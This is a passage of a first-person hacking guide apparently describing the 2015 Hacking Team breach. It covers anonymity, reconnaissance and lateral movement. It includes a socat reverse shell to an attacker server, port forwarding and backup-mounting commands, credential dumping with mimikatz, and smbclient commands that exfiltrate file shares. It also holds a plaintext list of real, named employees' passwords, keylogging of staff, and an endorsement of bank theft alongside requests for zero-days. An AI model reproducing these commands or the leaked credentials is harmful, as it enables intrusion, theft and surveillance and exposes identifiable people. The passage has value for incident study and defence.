    precautions:

    1) Encrypt your hard disk [2]

    I guess when the police arrive to seize your computer, it means you’ve
    already made a lot of mistakes, but it’s better to be safe.

    2) Use a virtual machine with all traffic routed through Tor

    This accomplishes two things. First, all your traffic is anonymized through
    Tor. Second, keeping your personal life and your hacking on separate
    computers helps you not to mix them by accident.

    You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
    something custom [6]. Here’s [7] a detailed comparison.

    3) (Optional) Don’t connect directly to Tor

    Tor isn’t a panacea. They can correlate the times you’re connected to Tor
    with the times your hacker handle is active. Also, there have been
    successful attacks against Tor [8]. You can connect to Tor using other
    peoples’ wifi. Wifislax [9] is a linux distro with a lot of tools for
    cracking wifi. Another option is to connect to a VPN or a bridge node [10]
    before Tor, but that’s less secure because they can still correlate the
    hacker’s activity with your house’s internet activity (this was used as
    evidence against Jeremy Hammond [11]).

    The reality is that while Tor isn’t perfect, it works quite well. When I
    was young and reckless, I did plenty of stuff without any protection (I’m
    referring to hacking) apart from Tor, that the police tried their hardest
    to investigate, and I’ve never had any problems.

    [1] https://www.torproject.org/
    [2] https://info.securityinabox.org/es/chapter-4
    [3] https://www.whonix.org/
    [4] https://tails.boum.org/
    [5] https://www.qubes-os.org/doc/privacy/torvm/
    [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
    [7] https://www.whonix.org/wiki/Comparison_with_Others
    [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
    [9] http://www.wifislax.com/
    [10] https://www.torproject.org/docs/bridges.html.en
    [11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html

    —-[ 3.1 – Infrastructure ]—————————————————-

    I don’t hack directly from Tor exit nodes. They’re on blacklists, they’re
    slow, and they can’t receive connect-backs. Tor protects my anonymity while I
    connect to the infrastructure I use to hack, which consists of:

    1) Domain Names

    For C&C addresses, and for DNS tunnels for guaranteed egress.

    2) Stable Servers

    For use as C&C servers, to receive connect-back shells, to launch attacks,
    and to store the loot.

    3) Hacked Servers

    For use as pivots to hide the IP addresses of the stable servers. And for
    when I want a fast connection without pivoting, for example to scan ports,
    scan the whole internet, download a database with sqli, etc.

    Obviously, you have to use an anonymous payment method, like bitcoin (if it’s
    used carefully).

    —-[ 3.2 – Attribution ]——————————————————-

    In the news we often see attacks traced back to government-backed hacking
    groups (“APTs”), because they repeatedly use the same tools, leave the same
    footprints, and even use the same infrastructure (domains, emails, etc).
    They’re negligent because they can hack without legal consequences.

    I didn’t want to make the police’s work any easier by relating my hack of
    Hacking Team with other hacks I’ve done or with names I use in my day-to-day
    work as a blackhat hacker. So, I used new servers and domain names, registered
    with new emails, and payed for with new bitcoin addresses. Also, I only used
    tools that are publicly available, or things that I wrote specifically for
    this attack, and I changed my way of doing some things to not leave my usual
    forensic footprint.

    –[ 4 – Information Gathering ]————————————————-

    Although it can be tedious, this stage is very important, since the larger the
    attack surface, the easier it is to find a hole somewhere in it.

    —-[ 4.1 – Technical Information ]———————————————

    Some tools and techniques are:

    1) Google

    A lot of interesting things can be found with a few well-chosen search
    queries. For example, the identity of DPR [1]. The bible of Google hacking
    is the book “Google Hacking for Penetration Testers”. You can find a short
    summary in Spanish at [2].

    2) Subdomain Enumeration

    Often, a company’s main website is hosted by a third party, and you’ll find
    the company’s actual IP range thanks to subdomains like mx.company.com or
    ns1.company.com. Also, sometimes there are things that shouldn’t be exposed
    in “hidden” subdomains. Useful tools for discovering domains and subdomains
    are fierce [3], theHarvester [4], and recon-ng [5].

    3) Whois lookups and reverse lookups

    With a reverse lookup using the whois information from a domain or IP range
    of a company, you can find other domains and IP ranges. As far as I know,
    there’s no free way to do reverse lookups aside from a google “hack”:

    “via della moscova 13” site:www.findip-address.com
    “via della moscova 13” site:domaintools.com

    4) Port scanning and fingerprinting

    Unlike the other techniques, this talks to the company’s servers. I
    include it in this section because it’s not an attack, it’s just
    information gathering. The company’s IDS might generate an alert, but you
    don’t have to worry since the whole internet is being scanned constantly.

    For scanning, nmap [6] is precise, and can fingerprint the majority of
    services discovered. For companies with very large IP ranges, zmap [7] or
    masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
    sites.

    [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
    [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
    [3] http://ha.ckers.org/fierce/
    [4] https://github.com/laramies/theHarvester
    [5] https://bitbucket.org/LaNMaSteR53/recon-ng
    [6] https://nmap.org/
    [7] https://zmap.io/
    [8] https://github.com/robertdavidgraham/masscan
    [9] http://www.morningstarsecurity.com/research/whatweb
    [10] http://blindelephant.sourceforge.net/

    —-[ 4.2 – Social Information ]————————————————

    For social engineering, it’s useful to have information about the employees,
    their roles, contact information, operating system, browser, plugins,
    software, etc. Some resources are:

    1) Google

    Here as well, it’s the most useful tool.

    2) theHarvester and recon-ng

    I already mentioned them in the previous section, but they have a lot more
    functionality. They can find a lot of information quickly and
    automatically. It’s worth reading all their documentation.

    3) LinkedIn

    A lot of information about the employees can be found here. The company’s
    recruiters are the most likely to accept your connection requests.

    4) Data.com

    Previously known as jigsaw. They have contact information for many
    employees.

    5) File Metadata

    A lot of information about employees and their systems can be found in
    metadata of files the company has published. Useful tools for finding
    files on the company’s website and extracting the metadata are metagoofil
    [1] and FOCA [2].

    [1] https://github.com/laramies/metagoofil
    [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html

    –[ 5 – Entering the network ]————————————————–

    There are various ways to get a foothold. Since the method I used against
    Hacking Team is uncommon and a lot more work than is usually necessary, I’ll
    talk a little about the two most common ways, which I recommend trying first.

    —-[ 5.1 – Social Engineering ]————————————————

    Social engineering, specifically spear phishing, is responsible for the
    majority of hacks these days. For an introduction in Spanish, see [1]. For
    more information in English, see [2] (the third part, “Targeted Attacks”). For
    fun stories about the social engineering exploits of past generations, see
    [3]. I didn’t want to try to spear phish Hacking Team, as their whole business
    is helping governments spear phish their opponents, so they’d be much more
    likely to recognize and investigate a spear phishing attempt.

    [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
    [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
    [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

    —-[ 5.2 – Buying Access ]—————————————————–

    Thanks to hardworking Russians and their exploit kits, traffic sellers, and
    bot herders, many companies already have compromised computers in their
    networks. Almost all of the Fortune 500, with their huge networks, have some
    bots already inside. However, Hacking Team is a very small company, and most
    of it’s employees are infosec experts, so there was a low chance that they’d
    already been compromised.

    —-[ 5.3 – Technical Exploitation ]——————————————–

    After the Gamma Group hack, I described a process for searching for
    vulnerabilities [1]. Hacking Team had one public IP range:
    inetnum: 93.62.139.32 – 93.62.139.47
    descr: HT public subnet

    Hacking Team had very little exposed to the internet. For example, unlike
    Gamma Group, their customer support site needed a client certificate to
    connect. What they had was their main website (a Joomla blog in which Joomscan
    [2] didn’t find anything serious), a mail server, a couple routers, two VPN
    appliances, and a spam filtering appliance. So, I had three options: look for
    a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
    embedded devices. A 0day in an embedded device seemed like the easiest option,
    and after two weeks of work reverse engineering, I got a remote root exploit.
    Since the vulnerabilities still haven’t been patched, I won’t give more
    details, but for more information on finding these kinds of vulnerabilities,
    see [3] and [4].

    [1] http://pastebin.com/raw.php?i=cRYvK4jb
    [2] http://sourceforge.net/projects/joomscan/
    [3] http://www.devttys0.com/
    [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

    –[ 6 – Be Prepared ]———————————————————–

    I did a lot of work and testing before using the exploit against Hacking Team.
    I wrote a backdoored firmware, and compiled various post-exploitation tools
    for the embedded device. The backdoor serves to protect the exploit. Using the
    exploit just once and then returning through the backdoor makes it harder to
    identify and patch the vulnerabilities.

    The post-exploitation tools that I’d prepared were:

    1) busybox

    For all the standard Unix utilities that the system didn’t have.

    2) nmap

    To scan and fingerprint Hacking Team’s internal network.

    3) Responder.py

    The most useful tool for attacking windows networks when you have access to
    the internal network, but no domain user.

    4) Python

    To execute Responder.py

    5) tcpdump

    For sniffing traffic.

    6) dsniff

    For sniffing passwords from plaintext protocols like ftp, and for
    arpspoofing. I wanted to use ettercap, written by Hacking Team’s own ALoR
    and NaGA, but it was hard to compile it for the system.

    7) socat

    For a comfortable shell with a pty:
    my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
    hacked box: socat exec:’bash -li’,pty,stderr,setsid,sigint,sane \
    tcp:my_server:my_port

    And useful for a lot more, it’s a networking swiss army knife. See the
    examples section of its documentation.

    8) screen

    Like the shell with pty, it wasn’t really necessary, but I wanted to feel
    at home in Hacking Team’s network.

    9) a SOCKS proxy server

    To use with proxychains to be able to access their local network from any
    program.

    10) tgcd

    For forwarding ports, like for the SOCKS server, through the firewall.

    [1] https://www.busybox.net/
    [2] https://nmap.org/
    [3] https://github.com/SpiderLabs/Responder
    [4] https://github.com/bendmorris/static-python
    [5] http://www.tcpdump.org/
    [6] http://www.monkey.org/~dugsong/dsniff/
    [7] http://www.dest-unreach.org/socat/
    [8] https://www.gnu.org/software/screen/
    [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
    [10] http://tgcd.sourceforge.net/

    The worst thing that could happen would be for my backdoor or post-exploitation
    tools to make the system unstable and cause an employee to investigate. So I
    spent a week testing my exploit, backdoor, and post-exploitation tools in the
    networks of other vulnerable companies before entering Hacking Team’s network.

    –[ 7 – Watch and Listen ]——————————————————

    Now inside their internal network, I wanted to take a look around and think
    about my next step. I started Responder.py in analysis mode (-A to listen
    without sending poisoned responses), and did a slow scan with nmap.

    –[ 8 – NoSQL Databases ]——————————————————-

    NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
    community [1]. Just when I was worried that they’d finally patched all of the
    authentication bypass bugs in MySQL [2][3][4][5], new databases came into
    style that lack authentication by design. Nmap found a few in Hacking Team’s
    internal network:

    27017/tcp open mongodb MongoDB 2.6.5
    | mongodb-databases:
    | ok = 1
    | totalSizeMb = 47547
    | totalSize = 49856643072

    |_ version = 2.6.5

    27017/tcp open mongodb MongoDB 2.6.5
    | mongodb-databases:
    | ok = 1
    | totalSizeMb = 31987
    | totalSize = 33540800512
    | databases

    |_ version = 2.6.5

    They were the databases for test instances of RCS. The audio that RCS records
    is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
    from this. They were spying on themselves without meaning to.

    [1] https://www.shodan.io/search?query=product%3Amongodb
    [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
    [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
    [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
    [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
    [6] https://ht.transparencytoolkit.org/audio/

    –[ 9 – Crossed Cables ]——————————————————–

    Although it was fun to listen to recordings and see webcam images of Hacking
    Team developing their malware, it wasn’t very useful. Their insecure backups
    were the vulnerability that opened their doors. According to their
    documentation [1], their iSCSI devices were supposed to be on a separate
    network, but nmap found a few in their subnetwork 192.168.1.200/24:

    Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)

    3260/tcp open iscsi?
    | iscsi-info:
    | Target: iqn.2000-01.com.synology:ht-synology.name
    | Address: 192.168.200.66:3260,0
    |_ Authentication: No authentication required

    Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)

    3260/tcp open iscsi?
    | iscsi-info:
    | Target: iqn.2000-01.com.synology:synology-backup.name
    | Address: 10.0.1.72:3260,0
    | Address: 192.168.200.72:3260,0
    |_ Authentication: No authentication required

    iSCSI needs a kernel module, and it would’ve been difficult to compile it for
    the embedded system. I forwarded the port so that I could mount it from a VPS:

    VPS: tgcd -L -p 3260 -q 42838
    Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

    VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

    Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
    because it thinks its IP is 192.168.200.72 instead of 127.0.0.1

    The way I solved it was:
    iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT –to-destination 127.0.0.1

    And now, after:
    iscsiadm -m node –targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 –login

    …the device file appears! We mount it:
    vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

    and find backups of various virtual machines. The Exchange server seemed like
    the most interesting. It was too big too download, but it was possible to
    mount it remotely to look for interesting files:
    $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
    $ fdisk -l /dev/loop0
    /dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

    so the offset is 2048 * 512 = 1048576
    $ losetup -o 1048576 /dev/loop1 /dev/loop0
    $ mount -o ro /dev/loop1 /mnt/exchange/

    now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
    we find the hard disk of the VM, and mount it:
    vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
    mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

    …and finally we’ve unpacked the Russian doll and can see all the files from
    the old Exchange server in /mnt/part1

    [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf

    –[ 10 – From backups to domain admin ]—————————————–

    What interested me most in the backup was seeing if it had a password or hash
    that could be used to access the live server. I used pwdump, cachedump, and
    lsadump [1] on the registry hives. lsadump found the password to the besadmin
    service account:

    _SC_BlackBerry MDS Connection Service
    0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
    0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
    0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!………..

    I used proxychains [2] with the socks server on the embedded device and
    smbclient [3] to check the password:
    proxychains smbclient ‘//192.168.100.51/c$’ -U ‘hackingteam.local/besadmin%bes32678!!!’

    It worked! The password for besadmin was still valid, and a local admin. I
    used my proxy and metasploit’s psexec_psh [4] to get a meterpreter session.
    Then I migrated to a 64 bit process, ran “load kiwi” [5], “creds_wdigest”, and
    got a bunch of passwords, including the Domain Admin:

    HACKINGTEAM BESAdmin bes32678!!!
    HACKINGTEAM Administrator uu8dd8ndd12!
    HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin HACKINGTEAM m.romeo ioLK/(90 HACKINGTEAM l.guerra [email protected]=.= HACKINGTEAM d.martinez W4tudul3sp HACKINGTEAM g.russo GCBr0s0705! HACKINGTEAM a.scarafile Cd4432996111 HACKINGTEAM r.viscardi Ht2015! HACKINGTEAM a.mino A!e$$andra HACKINGTEAM m.bettini Ettore&Bella0314 HACKINGTEAM m.luppi Blackou7 HACKINGTEAM s.gallucci 1S9i8m4o! HACKINGTEAM d.milan set!dob66 HACKINGTEAM w.furlan Blu3.B3rry! HACKINGTEAM d.romualdi [email protected]# HACKINGTEAM l.invernizzi L0r3nz0123! HACKINGTEAM e.ciceri 2O2571&2E HACKINGTEAM e.rabe [email protected]! [1] https://github.com/Neohapsis/creddump7 [2] http://proxychains.sourceforge.net/ [3] https://www.samba.org/ [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf [5] https://github.com/gentilkiwi/mimikatz --[ 11 - Downloading the mail ]------------------------------------------------- With the Domain Admin password, I have access to the email, the heart of the company. Since with each step I take there's a chance of being detected, I start downloading their email before continuing to explore. Powershell makes it easy [1]. Curiously, I found a bug with Powershell's date handling. After downloading the emails, it took me another couple weeks to get access to the source code and everything else, so I returned every now and then to download the new emails. The server was Italian, with dates in the format day/month/year. I used: -ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')} with New-MailboxExportRequest to download the new emails (in this case all mail since June 5). The problem is it says the date is invalid if you try a day larger than 12 (I imagine because in the US the month comes first and you can't have a month above 12). It seems like Microsoft's engineers only test their software with their own locale. [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/ --[ 12 - Downloading Files ]---------------------------------------------------- Now that I'd gotten Domain Admin, I started to download file shares using my proxy and the -Tc option of smbclient, for example: proxychains smbclient '//192.168.1.230/FAE DiskStation' \ -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*' I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in the torrent like that. --[ 13 - Introduction to hacking windows domains ]------------------------------ Before continuing with the story of the "weones culiaos" (Hacking Team), I should give some general knowledge for hacking windows networks. ----[ 13.1 - Lateral Movement ]------------------------------------------------- I'll give a brief review of the different techniques for spreading withing a windows network. The techniques for remote execution require the password or hash of a local admin on the target. By far, the most common way of obtaining those credentials is using mimikatz [1], especially sekurlsa::logonpasswords and sekurlsa::msv, on the computers where you already have admin access. The techniques for "in place" movement also require administrative privileges (except for runas). The most important tools for privilege escalation are PowerUp [2], and bypassuac [3]. [1] https://adsecurity.org/?page_id=1821 [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1 Remote Movement: 1) psexec The tried and true method for lateral movement on windows. You can use psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's invoke_psexec [4], or the builtin windows command "sc" [5]. For the metasploit module, powershell empire, and pth-winexe [6], you just need the hash, not the password. It's the most universal method (it works on any windows computer with port 445 open), but it's also the least stealthy. Event type 7045 "Service Control Manager" will appear in the event logs. In my experience, no one has ever noticed during a hack, but it helps the investigators piece together what the hacker did afterwards. 2) WMI The most stealthy method. The WMI service is enabled on all windows computers, but except for servers, the firewall blocks it by default. You can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin wmic [5]. All except wmic just need the hash. 3) PSRemoting [10] It's disabled by default, and I don't recommend enabling new protocols. But, if the sysadmin has already enabled it, it's very convenient, especially if you use powershell for everything (and you should use powershell for almost everything, it will change [11] with powershell 5 and windows 10, but for now powershell makes it easy to do everything in RAM, avoid AV, and leave a small footprint) 4) Scheduled Tasks You can execute remote programs with at and schtasks [5]. It works in the same situations where you could use psexec, and it also leaves a well known footprint [12]. 5) GPO If all those protocols are disabled or blocked by the firewall, once you're Domain Admin, you can use GPO to give users a login script, install an msi, execute a scheduled task [13], or, like we'll see with the computer of Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and open the firewall. [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx [2] https://sourceforge.net/projects/winexe/ [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh [4] http://www.powershellempire.com/?page_id=523 [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/ [6] https://github.com/byt3bl33d3r/pth-toolkit [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py [8] https://www.trustedsec.com/june-2015/no_psexec_needed/ [9] http://www.powershellempire.com/?page_id=124 [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/ [11] https://adsecurity.org/?p=2277 [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py "In place" Movement: 1) Token Stealing Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain. Two tools for doing this are incognito [1] and the mimikatz token::* commands [2]. 2) MS14-068 You can take advantage of a validation bug in Kerberos to generate Domain Admin tickets [3][4][5]. 3) Pass the Hash If you have a user's hash, but they're not logged in, you can use sekurlsa::pth [2] to get a ticket for the user. 4) Process Injection Any RAT can inject itself into other processes. For example, the migrate command in meterpreter and pupy [6], or the psinject [7] command in powershell empire. You can inject into the process that has the token you want. 5) runas This is sometimes very useful since it doesn't require admin privileges. The command is part of windows, but if you don't have a GUI you can use powershell [8]. [1] https://www.indetectables.net/viewtopic.php?p=211165 [2] https://adsecurity.org/?page_id=1821 [3] https://github.com/bidord/pykek [4] https://adsecurity.org/?p=676 [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html [6] https://github.com/n1nj4sec/pupy [7] http://www.powershellempire.com/?page_id=273 [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1 ----[ 13.2 - Persistence ]------------------------------------------------------ Once you have access, you want to keep it. Really, persistence is only a challenge for assholes like Hacking Team who target activists and other individuals. To hack companies, persistence isn't needed since companies never sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple high-uptime servers. On the off chance that they all reboot at the same time, I have passwords and a golden ticket [1] as backup access. You can read more about the different techniques for persistence in windows here [2][3][4]. But for hacking companies, it's not needed and it increases the risk of detection. [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/ [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/ [3] http://www.hexacorn.com/blog/category/autostart-persistence/ [4] https://blog.netspi.com/tag/persistence/ ----[ 13.3 - Internal reconnaissance ]------------------------------------------ The best tool these days for understanding windows networks is Powerview [1]. It's worth reading everything written by it's author [2], especially [3], [4], [5], and [6]. Powershell itself is also quite powerful [7]. As there are still many windows 2000 and 2003 servers without powershell, you also have to learn the old school [8], with programs like netview.exe [9] or the windows builtin "net view". Other techniques that I like are: 1) Downloading a list of file names With a Domain Admin account, you can download a list of all filenames in the network with powerview: Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ | select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] | select fullname | out-file -append files.txt} Later, you can read it at your leisure and choose which files to download. 2) Reading email As we've already seen, you can download email with powershell, and it has a lot of useful information. 3) Reading sharepoint It's another place where many businesses store a lot of important information. It can also be downloaded with powershell [10]. 4) Active Directory [11] It has a lot of useful information about users and computers. Without being Domain Admin, you can already get a lot of info with powerview and other tools [12]. After getting Domain Admin, you should export all the AD information with csvde or another tool. 5) Spy on the employees One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi (one of Hacking Team's sysadmins) gave me access to a Nagios server which gave me access to the rete sviluppo (development network with the source code of RCS). With a simple combination of Get-Keystrokes and Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang [14], and GPO, you can spy on any employee, or even on the whole domain. [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView [2] http://www.harmj0y.net/blog/tag/powerview/ [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/ [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/ [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/ [6] http://www.slideshare.net/harmj0y/i-have-the-powerview [7] https://adsecurity.org/?p=2535 [8] https://www.youtube.com/watch?v=rpwrKhgMd7E [9] https://github.com/mubix/netview [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/ [11] https://adsecurity.org/?page_id=41 [12] http://www.darkoperator.com/?tag=Active+Directory [13] https://github.com/PowerShellMafia/PowerSploit [14] https://github.com/samratashok/nishang --[ 14 - Hunting Sysadmins ]---------------------------------------------------- Reading their documentation about their infrastructure [1], I saw that I was still missing access to something important - the "Rete Sviluppo", an isolated network with the source code for RCS. The sysadmins of a company always have access to everything, so I searched the computers of Mauro Romeo and Christian Pozzi to see how they administer the Sviluppo network, and to see if there were any other interesting systems I should investigate. It was simple to access their computers, since they were part of the windows domain where I'd already gotten admin access. Mauro Romeo's computer didn't have any ports open, so I opened the port for WMI [2] and executed meterpreter [3]. In addition to keylogging and screen scraping with Get-Keystrokes and Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 [4], and searched for interesting files [5]. Upon seeing that Pozzi had a Truecrypt volume, I waited until he'd mounted it and then copied off the files. Many have made fun of Christian Pozzi's weak passwords (and of Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I included them in the leak as a false clue, and to laugh at him. The reality is that mimikatz and keyloggers view all passwords equally. [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/ [2] http://www.hammer-software.com/wmigphowto.shtml [3] https://www.trustedsec.com/june-2015/no_psexec_needed/ [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde [5] http://pwnwiki.io/#!presence/windows/find_files.md [6] http://archive.is/TbaPy [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/ [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/ --[ 15 - The bridge ]----------------------------------------------------------- Within Christian Pozzi's Truecrypt volume, there was a textfile with many passwords [1]. One of those was for a Fully Automated Nagios server, which had access to the Sviluppo network in order to monitor it. I'd found the bridge I needed. The textfile just had the password to the web interface, but there was a public code execution exploit [2] (it's an unauthenticated exploit, but it requires that at least one user has a session initiated, for which I used the password from the textfile). [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt [2] http://seclists.org/fulldisclosure/2014/Oct/78 --[ 16 - Reusing and resetting passwords ]-------------------------------------- Reading the emails, I'd seen Daniele Milan granting access to git repos. I already had his windows password thanks to mimikatz. I tried it on the git server and it worked. Then I tried sudo and it worked. For the gitlab server and their twitter account, I used the "forgot my password" function along with my access to their mail server to reset the passwords. --[ 17 - Conclusion ]----------------------------------------------------------- That's all it takes to take down a company and stop their human rights abuses. That's the beauty and asymmetry of hacking: with 100 hours of work, one person can undo years of work by a multi-million dollar company. Hacking gives the underdog a chance to fight and win. Hacking guides often end with a disclaimer: this information is for educational purposes only, be an ethical hacker, don't attack systems you don't have permission to, etc. I'll say the same, but with a more rebellious conception of "ethical" hacking. Leaking documents, expropriating money from banks, and working to secure the computers of ordinary people is ethical hacking. However, most people that call themselves "ethical hackers" just work to secure those who pay their high consulting fees, who are often those most deserving to be hacked. Hacking Team saw themselves as part of a long line of inspired Italian design [1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri, and government, as part of a long tradition of Italian fascism. I'd like to dedicate this guide to the victims of the raid on the Armando Diaz school, and to all those who have had their blood spilled by Italian fascists. [1] https://twitter.com/coracurrier/status/618104723263090688 --[ 18 - Contact ]-------------------------------------------------------------- To send me spear phishing attempts, death threats in Italian [1][2], and to give me 0days or access inside banks, corporations, governments, etc. [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/ [2] https://twitter.com/CthulhuSec/status/619459002854977537 only encrypted email please: https://securityinabox.org/es/thunderbird_usarenigmail -----BEGIN PGP PUBLIC KEY BLOCK----- mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g 27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x +fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8 Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0 JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys 4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8 X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9 WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR 